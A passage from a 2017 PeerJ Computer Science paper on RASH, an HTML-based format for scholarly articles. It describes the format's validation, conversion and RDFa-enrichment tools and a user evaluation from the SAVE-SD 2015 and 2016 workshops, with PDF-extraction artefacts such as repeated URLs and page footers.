(https://github.com/essepuntato/rash/blob/master/tools/rash-check.sh) to enable RASH users to check their documents simultaneously both against the specific requirements in the RASH RelaxNG grammar and also against the HTML specification through W3C Nu HTML Checker (http://validator.w3.org/nu/). This will hopefully help RASH users to timely detect and fix any mistakes in their documents. This script also checks datatype microsyntaxes. In addition to the aforementioned script, we developed a Python application (https://github.com/essepuntato/rash/tree/master/tools/rash-validator) that enables one to validate RASH documents against the RASH grammar. This application makes also available a Web interface for visualising all the validation issues retrieved in RASH documents. Visualising RASH documents The visualization of a RASH document is rendered by the browser by means of appropriate CSS3 (http://www.w3.org/Style/CSS/specs.en.html) stylesheets (Atkins Jr, Etemad & Rivoal, 2017) and Javascript developed for this purpose. RASH adopts external libraries, such as Bootstrap (http://getbootstrap.com/) and JQuery (http://jquery.com/), in order to provide the current visualisation and include additional tools for the user. For instance, the footbar with statistics about the paper (i.e., number of Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 17/35 https://peerj.com http://opensource.org/licenses/ISC http://creativecommons.org/licenses/by/4.0/ https://github.com/essepuntato/rash/blob/master/tools/rash-check.sh http://validator.w3.org/nu/ https://github.com/essepuntato/rash/tree/master/tools/rash-validator http://www.w3.org/Style/CSS/specs.en.html http://getbootstrap.com/ http://jquery.com/ http://dx.doi.org/10.7717/peerj-cs.132 8The layouts currently available are Web- based and Springer’s Lecture Note in Computer Science (http://www.springer. com/computer/lncs?SGWID=0-164-6- 793341-0)—the latter is based on the Springer LNCS CSS included in dokieli (http://dokie.li) (Capadisli et al., 2017). words, figures, tables and formulas) and a menu to change the actual layout of the page8, the automatic reordering of footnotes and references, the visualisation of the metadata of the paper, etc. Note that this kind of automatic rendering of paper items, such as references to a bibliographic entry or a figure, reduce the cognitive effort of an author when writing a RASH paper. For instance, a piece of text referencing a table, e.g., ‘‘as shown in Table 2’’, is created without caring about the particular text to specify for that reference (‘‘Table 2’’ in the example), since RASH prescribes to specify just an empty link to the object one wants to refer to, as shown in the following excerpt: <p>... as shown in <a href ="# table_patterns "></a> ...</p> For these objects, the Javascript scripts decide which is the most suitable text to put there according to the type of the item referenced. Converting RASH into LaTeX styles We spent some effort in preparing XSLT 2.0 documents (Kay, 2007) for converting RASH documents into different LaTeX styles, such as ACM ICPS (http://www.acm. org/sigs/publications/proceedings-templates) and Springer LNCS (http://www.springer. com/computer/lncs?SGWID=0-164-6-793341-0), among the others. We believe this is essential to foster the use of RASH within international events and to easily publish RASH documents in the official LaTeX format currently required by the organisation committee of such events. Obviously, the full adoption of RASH or any other Web-first format would make these stylesheets not necessary but, currently, they are fundamental for the adoption of the overall approach. Producing RASH from ODT and DOCX We also developed two XSLT 2.0 documents to perform conversion from Apache OpenOffice documents (https://github.com/essepuntato/rash/blob/master/xslt/from- odt.xsl) and Microsoft Word documents (https://github.com/essepuntato/rash/blob/ master/xslt/from-docx.xsl) into RASH documents. The RASH documentation provides a detailed description of how to use Apache OpenOffice (https://rawgit.com/essepuntato/ rash/master/documentation/rash-in-odt.odt) and Microsoft Word (https://rawgit. com/essepuntato/rash/master/documentation/rash-in-docx.docx) for writing scientific documents that can be easily converted to the RASH format. The standard features of these two editors (e.g., styles, document properties, etc.), elements (e.g., lists, pictures, captions, footnotes, hyperlinks, etc.) and facilities (e.g., mathematical editor, cross-reference editor, etc.) can be used to produce fully compliant RASH documents. A web-based service, for converting documents online (presented in ‘ROCS’) and two Java applications for ODT (https://github.com/essepuntato/rash/tree/master/tools/odt2rash) and DOCX (https://github.com/essepuntato/rash/tree/master/tools/docx2rash) documents (that can be downloaded and used offline on the local machine) were developed to facilitate the conversion process of Apache OpenOffice and Microsoft Word documents into the RASH format. Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 18/35 http://www.springer.com/computer/lncs?SGWID=0-164-6-793341-0 http://www.springer.com/computer/lncs?SGWID=0-164-6-793341-0 http://www.springer.com/computer/lncs?SGWID=0-164-6-793341-0 http://dokie.li https://peerj.com http://www.acm.org/sigs/publications/proceedings-templates http://www.acm.org/sigs/publications/proceedings-templates http://www.springer.com/computer/lncs?SGWID=0-164-6-793341-0 http://www.springer.com/computer/lncs?SGWID=0-164-6-793341-0 https://github.com/essepuntato/rash/blob/master/xslt/from-odt.xsl https://github.com/essepuntato/rash/blob/master/xslt/from-odt.xsl https://github.com/essepuntato/rash/blob/master/xslt/from-docx.xsl https://github.com/essepuntato/rash/blob/master/xslt/from-docx.xsl https://rawgit.com/essepuntato/rash/master/documentation/rash-in-odt.odt https://rawgit.com/essepuntato/rash/master/documentation/rash-in-odt.odt https://rawgit.com/essepuntato/rash/master/documentation/rash-in-docx.docx https://rawgit.com/essepuntato/rash/master/documentation/rash-in-docx.docx https://github.com/essepuntato/rash/tree/master/tools/odt2rash https://github.com/essepuntato/rash/tree/master/tools/docx2rash http://dx.doi.org/10.7717/peerj-cs.132 Figure 2 ROCS. The architecture of ROCS. In the past few years, as sort of alpha-testing, we have used these conversion approaches with many internal projects in the Digital and Semantic Publishing Laboratory of the Department of Computer Science and Engineering at the University of Bologna. Moreover, also our co-authors and collaborators from different disciplines (e.g., business and management, humanities, medicine, etc.) have successfully used this approach for producing their documents, giving us a chance to have fruitful feedback, comments, and suggestions. In particular, we have been able to convert with discrete success several ODT and DOCX files of research papers, PhD theses, documentations, and project proposals and deliverables. ROCS We created an online conversion tool called ROCS (RASH Online Conversion Service) (http://dasplab.cs.unibo.it/rocs) (Di Iorio et al., 2016) for supporting authors in writing RASH documents and preparing submissions that could be easily processed by journals, workshops, and conferences. ROCS integrates the tools introduced in the previous sections. The abstract architecture of the tool is shown in Fig. 2. ROCS allows converting either an ODT document or a DOCX document, written according to specific guidelines, into RASH and, then, into LaTeX according to the following layouts: Springer LNCS, ACM IPCS, ACM Journal Large, PeerJ. Such guidelines, introduced in ‘Producing RASH from ODT and DOCX’, are very simple and use only the basic features available in Apache OpenOffice Writer and in Microsoft Word, without any external tool or plug-in. ROCS allows users to upload four kinds of file, i.e., an ODT document, a DOCX document, an HTML file compliant with RASH, and a ZIP archive which contains an Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 19/35 https://peerj.com http://dasplab.cs.unibo.it/rocs http://dx.doi.org/10.7717/peerj-cs.132 9The source code and binaries of SPAR Xtractor are available at https://github. com/essepuntato/rash/tree/master/sources/ spar-xtractor and https://github.com/ essepuntato/rash/tree/master/tools/spar- xtractor, respectively. 10The prefix po: stands for the namespace http://www.essepuntato.it/2008/12/ pattern#. HTML file compliant with RASH and related files (i.e., CSSs, javascript files, fonts, images). It returns a ZIP archive containing the original document plus all its converted versions, i.e., RASH, if an ODT/DOCX file was given, and the LaTeX file. The main advantage of having the paper both in RASH and in LaTeX is that it is fairly easy for RASH to be adopted by workshops, conferences or journals. Since the program committee, the reviewers, and the editors have also access to a LaTeX or a PDF version of the paper, the RASH file is an addition that does not preclude any current workflows. Of course, the hope is that the inherent advantages of an HTML-based format such as RASH will eventually persuade stakeholders to adopt the HTML version whenever it is possible, keeping the alternatives as fall-back options. Enriching RASH documents with structural semantics Another development of the RASH Framework concerns the automatic enrichment of RASH documents with RDFa annotations defining the actual structure of such documents in terms of the FRBR-aligned Bibliographic Ontology (FaBIO) (http://purl.org/spar/fabio) and the Document Component Ontology (DoCO) (http://purl.org/spar/doco) (Constantin et al., 2016). More in detail, we developed a Java application called SPAR Xtractor suite9. SPAR Xtractor is designed as a one-click tool able to add automatically structural semantics to a RASH document. SPAR Xtractor takes a RASH document as input and returns a new RASH document where all its markup elements have been annotated with their actual structural semantics by means of RDFa. The tool associates a set of FaBIO or DoCO types with specific HTML elements. The set of HTML elements and their associations with FaBIO or DoCO types can be customised according to specific needs of expressivity. The default association provided by the current release of SPAR Xtractor is the following: • the root html element is mapped to an individual of the class fabio:Expression (http://purl.org/spar/fabio/Expression). The class fabio:Expression identifies the specific intellectual or artistic form that a work takes each time it is realised; • the body element is mapped to an individual of the class doco:BodyMatter (http://purl.org/spar/doco/BodyMatter). The class doco:BodyMatter is the central principle part of a document, it contains the real document content, and it is subdivided hierarchically by means of sections; • p elements are represented as individuals of the class doco:Paragraph (http: //purl.org/spar/doco/Paragraph), i.e., self-contained units of discourse that deal with a particular point or idea; • figure elements containing the element img within a paragraph are represented as individuals of the class doco:FigureBox (http://purl.org/spar/doco/FigureBox), which is a space within a document that contains a figure and its caption; • section elements are mapped to individuals of the class doco:Section (http: //purl.org/spar/doco/Section), which represents a logical division of the text. Sections can be organised according to a variable level of nested sub-sections. Accordingly, SPAR Xtractor reflects this structural behaviour by representing the containment relation by means of the object property po:contains (http://www.essepuntato.it/2008/12/ pattern#contains)10. For example, a certain section element with a nested section Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 20/35 https://github.com/essepuntato/rash/tree/master/sources/spar-xtractor https://github.com/essepuntato/rash/tree/master/sources/spar-xtractor https://github.com/essepuntato/rash/tree/master/sources/spar-xtractor https://github.com/essepuntato/rash/tree/master/tools/spar-xtractor https://github.com/essepuntato/rash/tree/master/tools/spar-xtractor https://github.com/essepuntato/rash/tree/master/tools/spar-xtractor http://www.essepuntato.it/2008/12/pattern# http://www.essepuntato.it/2008/12/pattern# https://peerj.com http://purl.org/spar/fabio http://purl.org/spar/doco http://purl.org/spar/fabio/Expression http://purl.org/spar/doco/BodyMatter http://purl.org/spar/doco/Paragraph http://purl.org/spar/doco/Paragraph http://purl.org/spar/doco/FigureBox http://purl.org/spar/doco/Section http://purl.org/spar/doco/Section http://www.essepuntato.it/2008/12/pattern#contains http://www.essepuntato.it/2008/12/pattern#contains http://dx.doi.org/10.7717/peerj-cs.132 element produces two individuals of the class doco:Section (e.g., :section_outer a doco:Section and :section_inner a doco:Section) related by the property po:contains (e.g., section_outer po:contains :section_inner). In addition to these semantic annotations, which come from the actual structure of a document, the tool is also able to automatically detect sentences and annotate them as individuals of the class doco:Sentence (http://purl.org/spar/doco/Sentence). A doco:Sentence denotes an expression in natural language forming a single grammatical unit. For the sentence detection task, SPAR Xtractor relies on the sentence detection module of the Apache OpenNLP project (https://opennlp.apache.org/), which provides a machine learning based toolkit for the processing of natural language text. By default, SPAR Xtractor is released to support English only. However, it is possible to extend it with new languages by adding their corresponding models for Apache OpenNLP, most of which are available with an open licence (http://opennlp.sourceforge.net/models-1.5/). We remark that the object property po:contains is used for representing any kind of containment relation among the structural components that SPAR Xtractor deals with. Hence, the usage of such a property is not limited to the individuals of the class doco:Section only. In fact, the property po:contains can be used, for example, for expressing the containment relation between a doco:BodyMatter and a doco:Section or between a doco:Section and a doco:Sentence. For example, let us consider the following code snippets that provide a sample HTML document. <html > ... <body > ... <section ><h1>A section </h1> ... <p>This is a sentence. This is another sentence of this paragraph.</p> ... <section ><h1>A sub -section </h1> ... </section > ... </section > ... </body > </html > The HTML document in the snippet above is enriched by SPAR Xtractor resulting in the document reported in the snippet below. <html resource =" expression" typeof ="http :// purl.org/spar/fabio/Expression"> ... <body resource ="body" typeof ="http :// purl.org/spar/doco/BodyMatter" property ="http ://www.essepuntato.it /2008/12/ pattern#contains"> ... <section resource =" section_outer" typeof ="http :// purl.org/spar/doco/Section" property ="http ://www.essepuntato.it /2008/12/ pattern#contains"> <h1 resource =" section_outer/title" typeof ="http :// purl.org/spar/doco/SectionTitle" > <span property ="http :// purl.org/spar/c4o/hasContent"> A section </span > </h1> ... <p resource =" section_outer/paragraph -1" typeof ="http :// purl.org/spar/doco/Paragraph" property ="http ://www.essepuntato.it /2008/12/ pattern#contains" > Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 21/35 https://peerj.com http://purl.org/spar/doco/Sentence https://opennlp.apache.org/ http://opennlp.sourceforge.net/models-1.5/ http://dx.doi.org/10.7717/peerj-cs.132 <span property ="http ://www.essepuntato.it /2008/12/ pattern#contains" resource =" section_outer/paragraph -1/ sentence -1" typeof ="http :// purl.org/spar/doco/Sentence"> <span property ="http :// purl.org/spar/c4o/hasContent"> This is a sentence. </span > </span > <span property ="http ://www.essepuntato.it /2008/12/ pattern#contains" resource =" section_outer/paragraph -1/ sentence -2" typeof ="http :// purl.org/spar/doco/Sentence"> <span property ="http :// purl.org/spar/c4o/hasContent"> This is another sentence of this paragraph. </span > </span > </p> ... <section resource =" section_inner" typeof ="http :// purl.org/spar/doco/Section" property ="http ://www.essepuntato.it /2008/12/ pattern#contains"> <h1 resource =" section_inner/title" typeof ="http :// purl.org/spar/doco/SectionTitle" "> <span property ="http :// purl.org/spar/c4o/hasContent"> A sub -section </span > </h1> ... </section > ... </section > ... </body > </html > Writing RASH documents with a native editor A recent development of RASH is the RASH Javascript Editor (RAJE) (https://github.com/ essepuntato/rash/tools/RAJE) (Spinaci et al., 2017), a multiplatform What You See Is What You Get (WYSIWYG) word processor for writing scholarly articles in HTML, according to the RASH format. In particular RAJE allows authors to write research papers in HTML natively by means of a user-friendly interface, instead of writing raw markup with an IDE, a text editor or any external word processor RAJE guarantees to its users the benefits of a word processor combined with those given by an HTML-based format, i.e., interactiveness, accessibility and easiness to be processed by machine. In addition, RAJE uses the GitHub API (https://api.github.com/) so as to allow authors to store their articles online, to keep track of changes by means of the GitHub services, and to share the articles with others. RASH AND SAVE-SD: AN EVALUATION The true validation for RASH as a format for research papers rests on its adoption by authors and workshops and its integration in the publishing process. For this reason, RASH was first released in conjunction with the Semantics, Analytics, Visualisation: Enhancing Scholarly Data (SAVE-SD 2015) workshop (http://cs.unibo.it/save-sd/2015/ index.html), co-located with WWW 2015. It was subsequently adopted by a number of workshops and conferences (https://github.com/essepuntato/rash/#rash-papers-accepted- in-scholarly-venues). In this section, we will present an evaluation of RASH based on the analysis of questionnaires completed by authors and reviewers of SAVE-SD 2015 and SAVE-SD 2016 (http://cs.unibo.it/save-sd/2016/index.html) workshops and a study on RDF annotations in the relevant papers. Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 22/35 https://peerj.com https://github.com/essepuntato/rash/tools/RAJE https://github.com/essepuntato/rash/tools/RAJE https://api.github.com/ http://cs.unibo.it/save-sd/2015/index.html http://cs.unibo.it/save-sd/2015/index.html https://github.com/essepuntato/rash/#rash-papers-accepted-in-scholarly-venues https://github.com/essepuntato/rash/#rash-papers-accepted-in-scholarly-venues http://cs.unibo.it/save-sd/2016/index.html http://dx.doi.org/10.7717/peerj-cs.132 The users were asked to fill a questionnaire which included a section about their background, a SUS questionnaire and six open questions about their experience with RASH. We will first introduce the two workshops and then discuss and compare the evaluation results. Finally, we will present an analysis of the most frequent vocabularies and entities in RASH papers. The completed questionnaires and the outcomes of the analysis are available at Osborne & Peroni (2016), while the RDF annotations considered in the study are embedded in the RASH papers available in the SAVE-SD 2015 and SAVE-SD 2016 websites. We used the online version of the RDFa 1.1 Distiller (https://www.w3.org/2012/pyRdfa/) for extracting the RDF annotations from the RASH papers. It is worth noting that in 2015 there were no converters in the RASH framework, and ROCS was introduced immediately before SAVE-SD 2016. Thus, in both years authors wrote RASH papers with plain text editors or XML editors, apart from one author that used ROCS in 2016. In general, the authors appreciated RASH and the tools in the RASH framework, even if the editing environment and the converters are still limited. SAVE-SD 2015 and 2016 SAVE-SD 2015 was organized by some of the authors of this paper with the aim of bringing together publishers, companies, and researchers in order to bridge the gap between the theoretical/academic and practical/industrialaspects in regard toscholarly data. Itwas thus a multifaceted workshop which drew researchers from a number of heterogeneous fields, such as Document and Knowledge Engineering, Semantic Web, Natural Language Processing, Scholarly Communication, Bibliometrics and Human–Computer Interaction. Since many of the interested researchers were keen on experimenting with novel technologies regarding semantic publishing, it was a natural choice for the debut of RASH. For this reason, SAVE-SD 2015 allowed authors to submit papers using either RASH or PDF, explicitly encouraging authors to test the new format. To this end, the organisers introduced a special award for the best submission in RASH, according to the quality of the markup, the number of RDF statements defined in RDFa, and the number of RDF links to LOD datasets. The possibility of submitting in RASH was also advertised on social media (e.g., Twitter (https: //twitter.com/savesdworkshop)), Facebook (https://www.facebook.com/savesdworkshop)) and during various international events (e.g., DL 2014 (http://www.city.ac.uk/digital- libraries-2014), EKAW 2014 (http://www.ida.liu.se/conferences/EKAW14/home.html), FORCE 2015 (https://www.force11.org/meetings/force2015)). The initiative had a substantial success: the workshop received six out of 23 submissions in RASH and after the review process an additional author chose to prepare the camera- ready paper in RASH. Out of these seven final submissions, three were research papers, one was a position paper, and three posters/demo. These papers were submitted by 16 authors from Switzerland, Italy, Germany, Netherlands, United Kingdom, Ireland, and the USA. At the time of the workshop submission deadline, there were no public tools available for converting other formats into RASH. However, the authors were able to self-learn it by simply referring to the documentation page, confirming that computer scientists have no particular problem in handling it directly. The conversion of the RASH submissions into the ACM format requested by the Sheridan publisher (responsible for the publications of Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 23/35 https://peerj.com https://www.w3.org/2012/pyRdfa/ https://twitter.com/savesdworkshop https://twitter.com/savesdworkshop https://www.facebook.com/savesdworkshop http://www.city.ac.uk/digital-libraries-2014 http://www.city.ac.uk/digital-libraries-2014 http://www.ida.liu.se/conferences/EKAW14/home.html https://www.force11.org/meetings/force2015 http://dx.doi.org/10.7717/peerj-cs.132 Table 3 User background for SAVE-SD 2015, SAVE-SD 2016. Year MS Word OO Writer LaTeX HTML XML RelaxNG SW RDFa Turtle JSON-LD 2015 33% 33% 83% 83% 100% 67% 83% 100% 100% 50% 2016 57% 0% 71% 71% 71% 29% 57% 57% 57% 43% AVR 40% 13% 67% 67% 73% 40% 60% 67% 77% 40% all WWW proceedings) was handled by the organisers through a semi-automatic process. In particular, they used the XSLT files introduced in ‘Converting RASH into LaTeX styles’ and had to fix only a few layout misalignments. Six authors and four reviewers involved in SAVE-SD 2015 participated in our evaluation. SAVE-SD 2016 had the same characteristics and goals of the predecessor. In order to give authors full freedom, the organizer decided to accept not only RASH, but any kind of HTML-based format. Since it was not possible to handle the conversion of all possible HTML-based format to the publisher layout, the authors of alternative formats were asked to prepare a PDF of the camera-ready version according to the publisher needs. SAVE-SD 2016 received 6 out of 16 submissions in RASH from 14 authors from Italy, Sweden, Greece, Germany, Belgium, and the USA. In total, five out of the 14 accepted papers were in RASH, including two full papers, two demos, and one position paper. Even if no author chose to submit in other HTML-based formats, this possibility will be kept open in future editions. Differently from the previous edition, the proceedings were published as a dedicated LNCS volume. The conversions of RASH papers to the PDF documents in Springer LNCS layout was automatically handled by ROCS. As in the previous workshop, we evaluated RASH by conducting the same study (with the same exact questions) on ten people. Seven authors of RASH papers and three reviewers participated in the survey. User background It is useful to first assess the background of RASH pioneer users in term of their knowledge of relevant technologies and software. For this reason, the first section of the survey included a number of statements about the user expertize (e.g., ‘‘I have extensive experience in writing academic papers with LaTeX’’) and allowed five response options, from ‘‘Strongly Agree’’ to ‘‘Strongly Disagree’’. Table 3 shows the percentage of users who claimed to be familiar with a range of technologies (by selecting ‘‘Agree’’ or ‘‘Strongly Agree’’). In 2015, the authors were mainly from the Semantic Web community and therefore familiar with technologies such as RDFa and Turtle. Most of them knew how to correctly annotate an HTML file and understood the advantages of including semantic relationships in the paper. They also commonly used LaTeX rather than Microsoft Word or OpenOffice Writer. This suggests that they were acquainted with WYSIWYG editors and had experience with complex formats. A qualitative analysis of the survey answers confirms this intuition; for example, an author remarked: ‘‘I am used to writing papers in LaTeX so I do not want to bother with formatting and in that sense RASH is similar’’. In 2016 the situation changed and only 57% of the users were familiar with semantic technologies. In addition, even if most of them knew how to use LaTex, the majority of Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 24/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.132 them had experience also with Microsoft Word. It seems thus that RASH started to interest also less technical users with different research backgrounds. User survey We assessed the strengths and weaknesses of RASH by means of six open questions. We summarize here the answers of both authors and reviewers for the 2015 and 2016 workshops. The reviewers answered only questions 2, 3, 4 and 5. Note that the questions were exactly the same in both editions and none of the users partecipated in both the surveys. SAVE-SD 2015 survey • [Q1] Why did you choose the RASH format for your paper? Four authors answered that the main reason was to try it out, mostly because they ‘‘supported the idea of publishing academic papers as HTML’’ and were convinced that ‘‘PDF should be replaced’’. Two of them added that they were motivated by the possibility of adding semantic annotations to their papers. • [Q2] How effectively did RASH support you in writing/reviewing the paper? The majority of the authors suggested that some tasks, such as setting up the bibliography, were still cumbersome. They added that the development of tools that could solve these issues and hide the technical details from the common users would be very important for a broader adoption. The reviewers remarked that their experience was very similar to reviewing a paper in PDF format and did not present any particular challenge (e.g., ‘‘did not have many features that would distinguish it from a PDF’’, ‘‘it met all of my needs and was easy to use’’). • [Q3] What were the most useful features of RASH to help you writing/reviewing the paper? The authors listed a number of functionalities including the multiple graphical layouts (two authors), the support of RDFa annotations (two) and the built-in validation (one). The ability to display the paper according to different layouts was praised also by reviewers. • [Q4] What were the main weaknesses that RASH exhibited in supporting the writing/re- viewing of the paper? Most authors suggested that the handling of bibliography, figures and captions should be improved. Half of them also pointed out that the manual insertion of semantic annotations was cumbersome and a large amount of RDFa ‘‘introduces a bit of confusion in the paper’’. An author observed that using the word count as a limit in the RASH venues rather than the number of pages introduces the issue of possibly exceeding the editor limits. Most reviewers did not report any problem in using RASH for assessing a paper. However, one of them noted that it still lacked a menu for easily navigating the different sections, as PDF files instead support. • [Q5] Can you think of any additional features to be included in RASH that would have helped you to write/review the paper? The majority of authors suggested that the aforementioned limitations were mainly Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 25/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.132 due to the use of an HTML editor, requesting the development of a WYSIWYG editor or a tool for converting from ODT to RASH. A user also suggested developing a tool for graphically showing the semantic annotations, as ‘‘what is linked to what, in order to check the correctness of assertions’’ and a reviewer advised to implement a way to easily access the different sections of the document. • [Q6] Would you use RASH regularly for writing your academic papers? Five out of six authors answered they would like to keep using RASH. Most of them, however, added that this would also depend on the creation of a better editor and a solid array of tools for managing technical details and converting standard formats for writing a research paper to and from RASH. SAVE-SD 2016 survey • [Q1] Why did you choose the RASH format for your paper? As with the 2015 results, the majority of the authors (four) claimed that they adopted it for trying a new format, three authors because they were motivated by the workshop and three because they actively support the ideas behind RASH. • [Q2] How effectively did RASH support you in writing/reviewing the paper? Five users wrote the papers directly in RASH and only one used Open Office and then converted it with ROCS. In the first group, one user was positive, one neutral, and three suggested the need for a WYSIWYG editor, since ‘‘writing in html is not so effective’’ and ‘‘not everyone [of the co-authors] knew how to validate against the schema’’. In particular, it was suggested the need for a Microsoft Word converter, since the ODT produced by Microsoft Word could not be processed by ROCS. As in 2015, the reviewers did not find many differences with respect to PDF papers. One of them claimed to actually prefer RASH since it ‘‘makes better use of the page space’’. • [Q3] What were the most useful features of RASH to help you writing/reviewing the pa- per? The authors mentioned a variety of different features including the formatting semantics (‘‘no worries about section and layout’’), the bibliographic reference management and the ability to display the paper according to different layouts. A reviewer also praised the ability to convert RASH to PDF. • [Q4] What were the main weaknesses that RASH exhibited in supporting the writing/re- viewing of the paper? Differently from 2015, the authors had no particular problem with the handling of bibliography, figures, and captions. However, most of them (five) remarked that directly writing the HTML code was not trivial. Three of them suggested solving the problem by introducing a WYSIWYG editor, while two of them suggested creating new converters to translate LaTeX and Microsoft Word into RASH. One user also flagged that the visualization of RASH document can change in different browsers. The reviewers, as in 2015, did not report any particular problem in using RASH. • [Q5] Can you think of any additional features to be included in RASH that would have helped you to write/review the paper? Consistently with the aforementioned weaknesses and the 2015 results the users called Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 26/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.132 11The authors who answered ‘‘Strongly Agree’’ to the background questions where classified as ‘‘Experts’’, the ones who answered ‘‘Agree’’ as ‘‘Familiars’’, and all the others as ‘‘Not familiar’’. for the creation of a WYSIWYG editor (3) and a way to convert from LaTeX and Microsoft Words (3). In addition, a user suggested a tool for automatically generating a bibliography, similar to BibTeX. • [Q6] Would you use RASH regularly for writing your academic papers? Three authors asserted that they would be happy to keep using RASH, two of them that they were ready to use it again, depending on its development, and only one was negative about it. RASH usability We also performed a quantitative analysis of the usability of RASH, using the System Usability Scale (SUS) questionnaire (Brooke, 1996). The scores are acceptable, though not very high, especially if we consider that all authors but one edited RASH files directly with text/XML editors. Users perceived even a ‘vanilla RASH’ as acceptable, though they need more sophisticated converters as remarked in the open questions of the survey. RASH yielded a mean score of 62.7 ± 11.9, slightly lower than the average SUS score (68). However, SUS scores varied dramatically according to the person’s background. Figure 3 shows the results of different categories of expertize11 in HTML, LateX, and Semantic Web Technologies (SWT), which appear correlated with the average SUS scores (respectively r =0.78, 0.97, 0.99). Users with a strong expertize in LaTeX and SWT yielded significantly better SUS scores than the other authors, while authors with HTML expertize yielded only slightly better scores. For this reason, authors from 2015, who as previously discussed had a higher expertize in these categories obtained an average SUS score of 69.6 ± 11.9, while the authors from 2016 yielded 57.1 ± 9.7. However, the difference is not statistically significant because the two samples are small and the test power is low. These results further confirm that most users with limited expertize in non-WYSIWYG editors and semantic technologies find it unfeasible to write HTML directly, even in a simplified form. Analysis of RDF annotations in RASH documents To complete the previous analysis, we also studied the nature of the semantic annotations in RASH papers. We focused on a sample of 1,751 annotations obtained from 11 papers published in SAVE-SD 2015 and 2016. The number of statements in a single paper was found to range from 24 to 903, yielding a median value of 46 (25th percentile 34, 75th percentile 175). We extracted all the RDF statements by running the W3C RDFa 1.1 Distiller service (https://www.w3.org/2012/pyRdfa/) on each article. We then considered only the statements that used http-based entities as predicates, or their objects if used for typing resources. The data are organised in several CSV files and have been obtained by running a Python script we developed for gathering the data used in this evaluation. The script and all the aforementioned data have been made available at Osborne & Peroni (2016). The first goal of the study was to determine the prevalent vocabularies and how much they were used in the average paper. The left panel of Fig. 4A shows the common vocabularies. Schema.org and PRISM are actually enforced by RASH: the first is used for standard metadata such as emails, affiliations and organization names and the second for keywords. Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 27/35 https://peerj.com https://www.w3.org/2012/pyRdfa/ http://dx.doi.org/10.7717/peerj-cs.132 Figure 3 Expertize vs. perceived usability. User expertize in HTML, LaTeX and Semantic Web Tech- nologies versus average SUS score. Figure 4 Average number of statements per vocabulary. Percentage of papers and average number of statements using a vocabulary. In addition, a quantity of RDF statements was automatically extracted when processing DPUB-ARIA roles (Garrish et al., 2016). Thus we will not consider such vocabularies in the rest of the evaluation. The other common vocabularies are Dublin Core, which appears in 82% of the papers, FOAF (27%) and the SPAR ontologies (Peroni, 2014a), such as FABIO (36%) and CITO (27%) (Peroni & Shotton, 2012). The right panel of Fig. 4B illustrates the average number of statement for each of these vocabularies. Dublin Core characterizes the highest number of annotation (9.4), followed by FOAF (7.4) and FABIO (6.4). Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 28/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.132 Figure 5 Average number of entities per vocabulary. Average percentage of vocabulary entities in a RASH paper (excluding the mandatory ones). We also performed a more fine-grained analysis considering the amount of entities of these vocabularies within the various RDF statements. The goal was to understand the percentage of contribution that the various entities provide (on average) to the statements of the document analysed. As expected, the entities that contribute to about 60% of the statements are either those that are obliged by RASH (prism:keyword 6.9%, schema:affiliation 5.7%, schema:name 5.3%, and schema:email 4.7%) or those automatically extracted by processing the DPUB roles included, mandatorily, in the documents (xhtml:role 38%). Excluding these, the following top ten entities, shown in Fig. 5, cover about 20% of the statements. Among these entities, there are three classes describing three diverse but interlinked kinds of objects, i.e., people (foaf:Person) authoring a research work (fabio:ResearchPaper) and the sentences (doco:Sentence) therein contained. The other seven entities are three object properties—two of them (pav:authoredBy and pattern:contains) provide the links between the three aforementioned classes, while the other, i.e., cito:cites, describes citation links between papers—and four data properties—used for providing additional metadata about the entities (dcterms:title, dcterms:bibliographicCitation, foaf:name) and for describing bunches of textual content of the sentences (c4o:hasContent). Discussion The evaluation study confirmed that RASH is ready to be adopted in workshops, conferences, and journals and can be quickly learnt by researchers who are already familiar with HTML. However, it also highlighted some issues in the adoption of HTML formats, especially by less technically savvy users. Interestingly, the 2016 survey showed that RASH is being tried also by users unfamiliar with semantic web technology. While the expansion of the user base represents a positive development, it also yields a number of challenges. The mass of authors accustomed to Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 29/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.132 WYSIWYG editors such as Microsoft Word or OpenOffice Writer, tend to have difficulties with HTML editors. In addition, since research papers are often written by multiple authors, it is usually simpler to use the most well-known solutions. For these reasons, we need to offer the authors who currently cannot or do not want to change their workflow the tools for converting their favourite format in to RASH and annotate the resulting paper. While ODT was a first step in this direction, it is imperative to be also able to process DOCX (which has been already implemented) and LaTeX. A second important issue is that authors who are not expert in semantic technologies can find it hard to correctly annotate their papers. Hence, we also need to use and/or develop simple tools for helping authors in this phase—such as the OpenLink Structured Data Editor (http://osde.openlinksw.com/). The introduction of these solutions will be critical for motivating users to adopt HTML-based approaches and for creating a robust framework that can be used by expert and common users alike. As far as the analysis of the RDF annotations in RASH documents is concerned, the outcomes highlighted that the users decided to adopt a few well-known standard vocabularies, rather than using a multiplicity of different solutions. The most used vocabularies other than Schema.org and PRISM (used by default by RASH), are Dublin Core, FOAF, and the SPAR ontologies. However, the outcomes of our evaluation generally show a quite low number of statements specified by the authors. This behaviour could derive from the lack of appropriate support for the annotation of RASH papers with RDF data. In addition, this low number seems not to be related to the research community the authors work in. For instance, several of the papers written by Semantic Web experts do not include any RDF statements other than those enforced by RASH. CONCLUSIONS In this paper we have introduced RASH, a markup language defined as a subset of HTML for writing scientific articles, and the RASH Framework, a set of specifications and tools for writing articles in RASH. In particular, we have discussed the rationale behind the development of RASH, and we have 